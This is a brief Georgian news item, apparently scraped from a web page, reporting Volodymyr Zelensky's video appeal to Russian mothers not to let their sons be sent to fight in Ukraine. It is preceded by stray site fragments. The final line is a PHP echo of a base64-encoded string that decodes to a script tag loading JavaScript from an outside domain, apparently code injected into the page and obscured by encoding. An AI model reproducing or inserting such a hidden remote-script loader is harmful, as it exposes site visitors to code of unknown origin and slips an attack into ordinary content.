celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტი, ვოლოდიმირ ზელენსკი რუსი სამხედროების დედებს მიმართავს და მოუწოდებს, დაუყოვნებლივ იმოქმედეონ და არ გაუშვან თავიანთი შვილები სხვის მიწაზე საბრძოლველად. ამის შესახებ ზელენსკიმ მორიგ ვიდეომიმართვაში ისაუბრა.
 
„მინდა, კიდევ ერთხელ მივმართო ყველა რუს დედას, განსაკუთრებით წვევამდელების დედებს, არ გამოუშვათ თქვენი შვილები სხვის მიწაზე საომრად. არ დაიჯეროთ დაპირებები, რომ თითქოს წვრთნებზე, არასაომარ ვითარებაში აგზავნიან. გადაამოწმეთ, სად არის თქვენი შვილი. თუკი გაგიჩნდებათ მცირე ეჭვი მაინც, რომ მათ უკრაინის წინააღდეგ საომრად აგზავნიან, სასწრაფოდ იმოქმედეთ! არ გაწიროთ ისინი სასიკვდილოდ ან ტყვედ ჩასავარდნად,“ - განაცხადა ზელენსკიმ ვიდეო მიმართვაში.
849
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");